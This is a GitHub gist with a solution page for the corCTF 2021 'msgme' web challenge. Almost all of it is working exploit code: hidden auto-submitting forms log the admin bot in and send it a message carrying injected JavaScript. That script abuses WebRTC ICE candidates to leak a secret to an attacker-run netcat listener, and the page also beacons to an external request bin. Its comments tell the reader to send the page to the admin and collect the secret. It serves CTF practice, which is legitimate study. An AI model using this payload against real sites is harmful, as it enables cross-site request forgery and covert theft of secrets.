Last active
August 28, 2021 00:33
-
-
Save strellic/b185bceb87e9fc981588d212c088bccd to your computer and use it in GitHub Desktop.
corCTF 2021 web/msgme solution code
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <h1>yo</h1> | |
| <script> | |
| /* | |
| modify the webrtc host and ip to somewhere you have a netcat listener. | |
| send this html file to the admin, and then you should receive the secret wrapped in ZZZZZZs | |
| then send !secret <secret> and observe network requests for your flag! | |
| */ | |
| const SITE = "https://msgme.be.ax"; | |
| let webrtc_host = "IP"; | |
| let webrtc_port = 7079; | |
| let name = `: '3';";config={iceServers:[{urls:['stun:stun.schlund.de?transport=udp'],username:'',credential:''}]},pc1=new RTCPeerConnection(config),pc2=new RTCPeerConnection(config),pc2.addEventListener('icecandidate',e=>{if(e.candidate&&'srflx'==e.candidate.type){console.log('before',e.candidate);let a=new RTCIceCandidate({candidate:e.candidate.candidate.replace('udp','tcp').replace(e.candidate.address,'${webrtc_host}').replace(e.candidate.port,'${webrtc_port}'),sdpMid:e.candidate.sdpMid,sdpMLineIndex:e.candidate.sdpMLineIndex,usernameFragment:e.candidate.usernameFragment});console.log('after',a),pc1.addIceCandidate(a).catch(e=>{console.log('Failure during addIceCandidate():'+e.name)})}}),ch1=pc1.createDataChannel(null),pc1.createOffer().then(e=>{e.sdp=e.sdp.replace('ice-ufrag:','ice-ufrag:ZZZZZZ`; | |
| let msg = `!math!roll!8ball!secret ZZZZZZ'),pc1.setLocalDescription(e),pc2.setRemoteDescription(e),pc2.createAnswer().then(e=>{pc2.setLocalDescription(e),pc1.setRemoteDescription(e)})});//`; | |
| const login = (name) => { | |
| let form = document.createElement("form"); | |
| form.target = "_blank"; | |
| form.method = "POST"; | |
| form.action = `${SITE}/chat/login`; | |
| let inputName = document.createElement("input"); | |
| inputName.type = "hidden"; | |
| inputName.name = "name"; | |
| inputName.value = name; | |
| form.appendChild(inputName); | |
| document.body.appendChild(form); | |
| form.submit(); | |
| }; | |
| const sendMessage = (to, msg) => { | |
| let form = document.createElement("form"); | |
| form.method = "POST"; | |
| form.action = `${SITE}/chat/send`; | |
| let inputTo = document.createElement("input"); | |
| inputTo.type = "hidden"; | |
| inputTo.name = "to"; | |
| inputTo.value = to; | |
| let inputMsg = document.createElement("input"); | |
| inputMsg.type = "hidden"; | |
| inputMsg.name = "msg"; | |
| inputMsg.value = msg; | |
| form.appendChild(inputTo); | |
| form.appendChild(inputMsg); | |
| document.body.appendChild(form); | |
| form.submit(); | |
| }; | |
| login(name); | |
| setTimeout(() => { | |
| window.open(`${SITE}/chat?from=${encodeURIComponent(name)}`); | |
| }, 2000); | |
| setTimeout(() => { | |
| navigator.sendBeacon("https://ent7dpcjud1fl.x.pipedream.net/?blyat"); | |
| sendMessage("admin", msg); | |
| }, 3000); | |
| </script> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment